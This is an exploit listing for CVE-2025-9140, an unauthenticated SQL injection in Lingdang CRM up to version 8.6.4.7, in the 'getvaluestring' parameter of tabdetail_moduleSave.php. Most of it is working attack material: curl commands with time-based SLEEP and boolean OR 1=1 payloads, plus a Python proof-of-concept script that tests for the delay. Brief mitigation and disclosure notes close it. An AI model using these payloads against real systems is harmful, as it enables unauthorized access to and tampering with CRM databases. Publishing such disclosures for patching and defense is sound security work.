📄 Lingdang CRM 8.6.4.7 SQL Injection

# Exploit Title: Lingdang CRM 8.6.4.7 - SQL Injection
    # Google Dork: N/A
    # Date: 2025-08-19
    # Exploit Author: Beatriz Fresno Naumova
    # Vendor: Shanghai Lingdang Information Technology)
    # Software Link: (N/A – commercial product)
    # Version: <= 8.6.4.7 (fixed in 8.6.5.x per vendor advisory)
    # Tested on: Generic LAMP stack, PHP 7/8 (PoC uses HTTP only; no OS dependency)
    # CVE : CVE-2025-9140
    
    # Summary
    # The endpoint /crm/crmapi/erp/tabdetail_moduleSave.php is vulnerable to SQL injection via the
    # 'getvaluestring' parameter. An unauthenticated remote attacker can perform boolean/time-based
    # blind SQL injection. Vendor states this was fixed by adopting parameterized queries in v8.6.5+.
    
    # Route
    #   /crm/crmapi/erp/tabdetail_moduleSave.php
    # Parameter
    #   getvaluestring (GET or POST)
    
    # Notes
    # * This PoC does NOT target a live site. Replace TARGET with a lab host you own.
    # * Demonstrates time-based blind (SLEEP) and boolean-based payloads.
    
    # --- Quick PoC with curl (time-based blind) ---
    # Expect ~5s response delay on vulnerable targets.
    
    # GET variant:
    curl -i -k "http://TARGET/crm/crmapi/erp/tabdetail_moduleSave.php?getvaluestring='||(SELECT SLEEP(5))--+-"
    
    # POST variant:
    curl -i -k -X POST "http://TARGET/crm/crmapi/erp/tabdetail_moduleSave.php" \
      --data "getvaluestring='||(SELECT SLEEP(5))--+-"
    
    # --- Boolean-based example (response/body differences may vary by deployment) ---
    curl -s -k "http://TARGET/crm/crmapi/erp/tabdetail_moduleSave.php?getvaluestring=' OR 1=1-- -" -o /tmp/true.html
    curl -s -k "http://TARGET/crm/crmapi/erp/tabdetail_moduleSave.php?getvaluestring=' OR 1=2-- -" -o /tmp/false.html
    # Compare /tmp/true.html vs /tmp/false.html for observable differences.
    
    # --- Python 3 PoC (time-based) ---
    # Save as lingdang_sqli_poc.py and run:  python3 lingdang_sqli_poc.py http://TARGET
    
    import sys, time, requests
    
    def test_time_sqli(base):
        url_get = f"{base.rstrip('/')}/crm/crmapi/erp/tabdetail_moduleSave.php"
        payload = "'||(SELECT SLEEP(5))--+-"
        try:
            t0 = time.time()
            r = requests.get(url_get, params={"getvaluestring": payload}, timeout=30, verify=False)
            dt = time.time() - t0
            print(f"[+] GET status={r.status_code} elapsed={dt:.2f}s")
            if dt >= 5:
                print("[+] Likely vulnerable to time-based SQLi via GET.")
            else:
                print("[-] No significant delay observed via GET.")
        except Exception as e:
            print(f"[!] GET error: {e}")
    
        try:
            t0 = time.time()
            r = requests.post(url_get, data={"getvaluestring": payload}, timeout=30, verify=False)
            dt = time.time() - t0
            print(f"[+] POST status={r.status_code} elapsed={dt:.2f}s")
            if dt >= 5:
                print("[+] Likely vulnerable to time-based SQLi via POST.")
            else:
                print("[-] No significant delay observed via POST.")
        except Exception as e:
            print(f"[!] POST error: {e}")
    
    if __name__ == "__main__":
        if len(sys.argv) != 2:
            print(f"Usage: {sys.argv[0]} http://TARGET")
            sys.exit(1)
        requests.packages.urllib3.disable_warnings()
        test_time_sqli(sys.argv[1])
    
    # --- Impact ---
    # Confidentiality, integrity, availability compromise via SQL injection (CWE-89).
    
    # --- Mitigations ---
    # 1) Use parameterized queries / prepared statements for getvaluestring.
    # 2) Server-side input validation and allow-listing for the parameter.
    # 3) Web Application Firewall (WAF) rules to block SQLi patterns on this route.
    
    # --- Disclosure ---
    # Public identifiers: CVE-2025-9140 (VulDB VDB-320520).
    # Vendor reportedly fixed in 8.6.5+ with parameterized queries.